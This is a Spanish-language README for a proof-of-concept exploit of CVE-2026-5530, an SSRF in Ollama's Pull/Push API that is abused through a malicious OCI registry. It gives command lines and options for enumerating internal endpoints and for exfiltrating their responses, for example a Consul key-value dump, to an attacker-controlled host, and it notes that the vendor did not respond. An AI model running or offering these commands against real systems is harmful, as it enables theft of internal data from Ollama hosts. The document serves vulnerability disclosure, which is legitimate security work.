
Prueba de concepto de exploit para CVE-2026-5530, un SSRF en la API Pull/Push de Ollama, que permite la enumeración de endpoints internos y la exfiltración completa de respuestas mediante un registro OCI malicioso.
SSRF en Ollama mediante redirección de registro OCI con exfiltración completa de la respuesta.
Informe: https://davidrochester.com/posts/cve-2026-5530
Se contactó con Ollama en múltiples ocasiones sin obtener respuesta.
Tres modos: enum, exfil y probe.
Encuentra endpoints internos activos accesibles desde el host de Ollama.
python3 poc.py targets.txt --registry-host <your-ip>
Exfiltra las respuestas SSRF cuando conoces el tamaño de la respuesta.
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>
Busca el tamaño de la respuesta mediante búsqueda binaria automáticamente y luego exfiltra.
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>
target URL o archivo de URLs (una por línea, # para comentarios)
-p, --port puerto del registro malicioso (por defecto: 9999)
--exfil-port puerto del registro de exfiltración (por defecto: 10000)
--exfil modo de exfiltración, requiere --size
--probe búsqueda binaria del tamaño, luego exfiltra
--size Content-Length (requerido con --exfil)
--registry-host tu IP/hostname de atacante al que Ollama pueda acceder
--ollama URL de la API de Ollama (por defecto: http://127.0.0.1:11434)